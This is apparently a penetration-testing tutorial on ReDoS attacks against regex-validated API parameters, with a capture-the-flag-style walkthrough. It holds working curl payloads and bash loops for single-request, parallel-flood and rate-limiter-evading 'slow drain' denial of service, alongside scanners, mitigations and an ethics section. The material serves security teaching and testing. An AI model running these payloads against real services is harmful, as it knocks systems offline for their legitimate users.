ReDoS
Some regex patterns trigger catastrophic backtracking on inputs that almost-but-don’t-quite match. A 50-character crafted string can lock a regex engine for seconds, minutes, or forever - denial of service from a single HTTP request. APIs that validate input via regex (email validators, URL validators, format checkers) are the primary surface.
# 1. Identify a regex-validated parameter (response leaks the pattern, error mentions regex,# or it's a documented format check like email/URL/phone)curl 'http://target/api/check-email?email=test_value'→ {"regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", ...}
# 2. Look for evil patterns - nested quantifiers, overlapping alternation# ([a-z]+)+ ← classic# (a|a)+ ← alternation with overlap# (a*)* ← nested *# (.*)*$ ← greedy-everything anchored
# 3. Craft an input that triggers backtracking - usually:# "string-that-almost-matches" + "character-that-breaks-the-match"curl 'http://target/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjj@cccccccccccccccc.55555555555555.'
# 4. Observe response time - multi-second hangs indicate ReDoStime curl '...?email=jjjjjjjj...' # baselinetime curl '[email protected].' # crafted (slow)Success indicator: response time scales superlinearly with input length - short inputs respond in milliseconds, slightly-longer inputs respond in seconds, slightly-longer-still inputs respond in minutes.
Why ReDoS exists
Section titled “Why ReDoS exists”Most regex engines (Perl-compatible, including PHP PCRE, Python re, JavaScript V8, .NET, Ruby) use backtracking to handle ambiguous patterns. When a regex has alternatives or quantifiers, the engine tries one path, and if it doesn’t match, backs up and tries another. For simple patterns this is fast. For patterns with overlapping options, the backtracking can take exponential time.
The “evil regex” class is patterns where the engine has many ways to partially match a string but the full match fails - every partial match has to be tried before the engine concludes “no match.”
A minimal evil regex
Section titled “A minimal evil regex”^(a+)+$Try matching aaaaaaaab (8 a’s followed by a b):
- Engine tries
(aaaaaaaa)+→ tries to match$againstb→ fails - Backtracks: tries
(aaaaaaa)(a)+→ tries to match$againstb→ fails - Backtracks: tries
(aaaaaa)(a)(a)+→ tries to match$againstb→ fails - …
For 8 a’s, the engine tries 2⁷ = 128 backtracking paths. For 30 a’s, 2²⁹ ≈ 500 million paths. Each path takes microseconds; cumulatively, seconds-to-minutes.
The trigger: an input where the regex almost matches, requiring full exploration of the backtracking tree before concluding “no match.”
Patterns that are vulnerable
Section titled “Patterns that are vulnerable”The patterns to spot in source review or leaked-regex responses:
Nested quantifiers
Section titled “Nested quantifiers”([a-z]+)+(\d+)*(.*)*Anything where a quantified group (+, *, {n,m}) wraps an already-quantified pattern. Each level multiplies the backtracking complexity.
Alternation with overlap
Section titled “Alternation with overlap”(a|a)*(ab|a)*b(x+x+)+yWhen an OR alternative can match the same prefix as another, the engine considers all combinations.
Group with greedy quantifier followed by anchor
Section titled “Group with greedy quantifier followed by anchor”^(\d+)$ # safe - \d is unambiguous^(.+)*$ # vulnerable - .+ matches anything, * adds another levelThe infamous email regex
Section titled “The infamous email regex”The HTB-style example:
^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$Walking through what makes it vulnerable:
| Section | Vulnerability |
|---|---|
([a-zA-Z0-9_.-])+ | OK - character class with single + |
(([a-zA-Z0-9-])+.)+ | Nested + - [...]+ inside (...)+. Each domain segment can match in multiple ways. |
([a-zA-Z0-9]{2,4})+ | Quantifier inside quantifier - TLD can be 2-4 chars, group is repeated. |
Multiple compounding issues. An attacker-crafted input forces exponential exploration.
Detection
Section titled “Detection”When the regex is exposed
Section titled “When the regex is exposed”Some APIs leak their regex in error responses or schema documents:
GET /api/check-email?email=test_value HTTP/1.1{ "regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", "success": false}Free win - paste the regex into a vulnerability checker:
- regex101.com - explains structure, flags ambiguities
- regulex (jex.im) - visualizes the state machine
- recheck - automated ReDoS scanner
- safe-regex - Node.js library that flags evil patterns
When the regex is hidden
Section titled “When the regex is hidden”For black-box detection, the workflow is:
-
Identify a format-validated parameter - email, URL, phone, ZIP, IP address. Any parameter where invalid input gets rejected with a “format” error.
-
Send a baseline valid input and time the response:
Terminal window real 0m0.012s -
Send increasingly long crafted inputs and watch for nonlinear response time growth:
Terminal window $ for length in 10 20 30 40 50 60 70; dopayload=$(python3 -c "print('j'*$length + '@' + 'c'*$length + '.55555.')")echo -n "Length $length: "time curl -s "http://target/api/check-email?email=$payload" > /dev/nulldoneLength 10: real 0m0.013sLength 20: real 0m0.019sLength 30: real 0m0.142sLength 40: real 0m2.341sLength 50: real 0m38.21sLength 60: (timeout)Exponential growth in response time confirms catastrophic backtracking.
Generic evil-input templates
Section titled “Generic evil-input templates”Without knowing the exact regex, these inputs catch common patterns:
| Target format | Evil input template |
|---|---|
[email protected]. (note trailing dot) | |
| URL | http://aaaa...aaa.com/aaa...aaa/! (trailing special char) |
| IPv4 | 0.0.0.0.0.0.0.0.0... (extra octets) |
| Phone | 1234567890123456789X (overlong + invalid char) |
| HTML tag | <a href="aaa...aaa"> (long attribute value) |
| Filename | aaa...aaa.aaa.aaa.aaa.zip (multi-dot) |
| ISO date | 2023-01-01T12:34:567890123 (overlong time) |
The pattern: long valid-looking prefix + character that breaks the final anchor.
Exploitation
Section titled “Exploitation”Single-request DoS
Section titled “Single-request DoS”$ curl --max-time 60 "http://target/api/check-email?email=$(python3 -c "print('j'*30 + '@' + 'c'*30 + '.5'*30 + '.')")"While the request is processing, the worker thread is locked. If the server has limited workers (e.g., uWSGI with 4 workers, PHP-FPM with 5 children), 5 concurrent crafted requests lock all workers - service unavailable to legitimate users.
Amplified DoS
Section titled “Amplified DoS”#!/bin/bash# Fire N parallel requests, each locking one workerfor i in $(seq 1 100); do curl --max-time 120 "http://target/api/check-email?email=$EVIL_INPUT" &donewaitNet effect: 100 worker-minutes consumed per second of attack. Service capacity is exhausted long before bandwidth is.
Stealthier DoS via slow drain
Section titled “Stealthier DoS via slow drain”Instead of obvious flood, drip-feed crafted inputs at a rate just slow enough to evade rate limiters:
while true; do curl --max-time 60 "http://target/api/check-email?email=$EVIL_INPUT" sleep 5doneEach request occupies one worker for ~30-60 seconds. Six workers locked at any time. Service is “available” by uptime metrics but practically unusable. Detection requires the defender to notice worker pool saturation, which is a thinner signal than request flood.
The HTB-style worked walkthrough
Section titled “The HTB-style worked walkthrough”Walking through the source-doc scenario:
Step 1 - Identify the surface
Section titled “Step 1 - Identify the surface”$ curl 'http://target:3000/api/check-email?email=test_value'{"regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", "success": false}The endpoint validates an email. Crucially, the response leaks the regex - no source-code access needed.
Step 2 - Analyze the regex
Section titled “Step 2 - Analyze the regex”Submit to regex101.com for explanation, or visualize at regulex. The visualization shows the nested quantifiers and overlapping character classes.
Step 3 - Craft the evil input
Section titled “Step 3 - Craft the evil input”The pattern needs an input that:
- Starts with characters matching the first capture group (
[a-zA-Z0-9_.-]+) - Contains an
@ - Has multiple “domain segments” (each matching
[a-zA-Z0-9-]+.) - Ends with characters that almost-but-don’t-quite match the TLD class
jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555.Multiple long groups of j/c/5, terminated with a trailing . that the TLD class can’t accept (because 5555...5. ends with . not an alphanumeric).
Step 4 - Confirm
Section titled “Step 4 - Confirm”$ time curl "http://target:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555."
# (waits 30+ seconds)
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", "success":false}
real 0m38.42sThe 38-second response time vs. the millisecond baseline confirms ReDoS.
Step 5 - Scale to DoS
Section titled “Step 5 - Scale to DoS”Five workers, each blocked for 30 seconds = 25 seconds of unavailability per attack cycle:
for i in {1..10}; do curl --max-time 60 "http://target:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555." &donewaitVulnerability scanners
Section titled “Vulnerability scanners”# Node-based: scan a regex string for catastrophic backtracking risk$ npm install -g safe-regex$ echo '/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/' | safe-regexFalse# (False means unsafe)
# Static analyzer for code containing regexes$ npx eslint --rule 'security/detect-unsafe-regex: error' source.js
# Comprehensive scanner (Java, C#, JS, Python, etc.)$ recheck check 'pattern_here'Burp extensions
Section titled “Burp extensions”Burp Pro’s “Active Scanner” detects ReDoS in some patterns. Community extensions:
- ReDoSinator - focused ReDoS testing
- Backslash Powered Scanner - detects various injection-like behaviors including timing-based regex issues
Curated wordlists
Section titled “Curated wordlists”Wikipedia ReDoS and OWASP ReDoS Cheat Sheet list known evil patterns and their canonical evil inputs. Test these against any format-validated parameter:
| Pattern | Evil input |
|---|---|
^(a+)+$ | aaaa...aaab |
(a*)*$ | aaaa...aaab |
^(a|a)+$ | aaaa...aaab |
(a|aa)+$ | aaaa...aaab |
^([a-zA-Z]+)*$ | XaXaXa...XaXa1 |
(\.\*?)* | ..........! |
| The email regex above | [email protected]. |
Defensive considerations
Section titled “Defensive considerations”When reporting ReDoS, the remediation tells you which targets to skip:
| Mitigation | Effect on attacker |
|---|---|
Use a non-backtracking regex engine (Rust regex, Go regexp, RE2) | Eliminates the class entirely |
Add regex timeout (re2.compile(pattern, timeout=100ms) equivalents) | Limits damage; attacker can still trigger 100ms-per-request waste |
| Replace regex with custom parsing | Eliminates the regex-specific vector |
| Input length limits | Bounds the worst case |
| WAF rules for “long input + format mismatch” | Partial - can be evaded |
Servers using RE2 (Google’s regex library) or Rust’s regex crate are immune to ReDoS by design - these engines guarantee linear-time evaluation. JS V8’s regex is not RE2; neither is Python’s re. PCRE (PHP, Apache rules) is not RE2 either.
Limitations and ethics
Section titled “Limitations and ethics”Production-scale ReDoS attacks are denial-of-service attacks. Engagement scope and authorization matter:
- In-scope DoS testing - proceed but document carefully; coordinate with the SRE team to avoid impacting other customers
- Bug bounty programs - DoS testing usually explicitly out of scope; report the vulnerability (the pattern) without triggering large-scale impact
- Pentesting - confirm one slow request (proves the vulnerability) without scaling to actual service disruption
The proof-of-concept is one crafted-input response time. Anything beyond that risks causing damage that the engagement may not authorize.
Quick reference
Section titled “Quick reference”| Task | Pattern |
|---|---|
| Spot regex disclosure in API response | Field literally named regex, or pattern characters in error string |
| Visualize a regex | regex101.com, regulex (jex.im) |
| Scan a regex for ReDoS risk | safe-regex, recheck |
| Evil patterns to look for | (x+)+, (x|x)+, (x*)*, (.+)*, nested groups with +/* |
| Evil input pattern | Long valid-prefix + breaking-character at the end |
| Baseline timing | time curl 'URL?param=normal_value' |
| Crafted timing | time curl 'URL?param=EVIL_INPUT' |
| Scaling for DoS confirmation | Loop with increasing length, watch nonlinear time growth |
| Single-request DoS | One crafted request, observe worker hangs |
| Amplified DoS | N parallel crafted requests, saturate worker pool |
| Stealthier DoS | Drip-feed slow but constant rate |
| Backtracking-immune engines | RE2 (Go regexp, Rust regex), Hyperscan |
| Backtracking-vulnerable engines | PCRE (PHP), V8 (JS), re (Python), regex (Ruby), .NET, Java Pattern |
For the API-specific context this attack lives in, see the Overview and API vuln context. For the capstone chain combining SOAPAction spoofing + SQL injection, see Skill assessment chain.